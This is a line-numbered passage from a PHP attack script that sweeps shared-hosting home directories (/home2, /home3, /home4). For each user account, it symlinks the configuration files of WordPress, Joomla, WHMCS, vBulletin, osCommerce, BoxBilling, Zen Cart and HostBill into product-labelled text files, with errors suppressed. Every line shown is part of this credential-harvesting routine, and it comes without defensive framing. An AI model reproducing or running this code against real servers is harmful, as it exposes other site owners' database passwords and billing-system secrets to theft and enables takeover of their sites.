2273. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2274. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2275. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2276. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2277. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2278. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2279. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2280. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2281. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2282. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2283. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2284. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2285. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2286. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2287. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2288. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2289. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2290. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2291. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2292. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2293. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2294. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2295. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2296. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2297. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2298. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2299. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2300. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2301. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2302. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2303. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2304.  
2305. //Home3
2306.  
2307. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2308. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2309. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2310. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2311. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2312. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2313. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2314. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2315. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2316. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2317. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2318. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2319. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2320. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2321. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2322. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2323. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2324. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2325. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2326. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2327. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2328. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2329. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2330. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2331. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2332. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2333. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2334. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2335. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2336. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2337. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2338. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2339. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2340. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2341. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2342. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2343. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2344. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2345. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2346. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2347. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2348. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2349. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2350. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2351. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2352. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2353. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2354. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2355. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2356. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2357. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2358. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2359. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2360. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2361. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2362. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2363. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2364. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2365. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2366. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2367. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2368. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2369. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2370. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2371. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2372. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2373. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2374. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2375. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2376. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2377. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2378. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2379. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2380. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2381. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2382. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2383. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2384. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2385. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2386. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2387. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2388. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2389. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2390. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2391. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2392. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2393. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2394. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2395. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2396. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2397. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2398. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2399. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2400. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2401. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2402. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2403. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2404. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2405. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2406. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2407. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2408. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2409. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2410. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2411. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2412. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2413. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2414. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2415. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2416. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2417. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2418. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2419. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2420. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2421. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2422. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2423. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2424. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2425. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2426. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2427. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2428. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2429. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2430. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2431. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2432. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2433. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2434. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2435. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2436. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2437. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2438. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2439. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2440. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2441. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2442. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2443. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2444. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2445. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2446. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2447. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2448. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2449. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2450. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2451. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2452. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2453. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2454. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2455. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2456. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2457. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2458. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2459. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2460. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2461. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2462. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2463. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2464. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2465. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2466. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2467. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2468. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2469. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2470. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2471. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2472. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2473. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2474. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2475. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2476. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2477. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2478. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2479. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2480. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2481. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2482. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2483. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2484. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2485. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2486. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2487.  
2488. //Home4
2489.  
2490. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2491. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2492. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2493. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2494. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2495. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2496. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2497. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2498. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2499. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2500. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2501. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2502. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2503. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2504. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2505. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2506. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2507. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2508. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2509. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2510. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2511. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2512. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2513. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2514. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2515. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2516. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2517. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2518. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2519. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2520. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2521. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2522. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2523. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2524. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2525. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2526. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2527. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2528. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2529. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2530. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2531. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2532. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2533. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2534. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2535. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2536. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2537. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2538. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2539. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2540. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2541. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2542. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2543. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2544. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2545. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2546. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2547. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2548. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2549. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2550. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2551. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2552. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2553. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2554. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2555. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2556. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2557. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2558. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2559. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2560. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2561. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2562. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2563. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2564. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2565. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2566. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2567. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2568. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2569. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2570. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2571. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2572. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2573. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2574. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2575. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2576. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2577. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2578. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2579. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2580. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2581. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2582. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2583. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2584. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2585. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2586. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
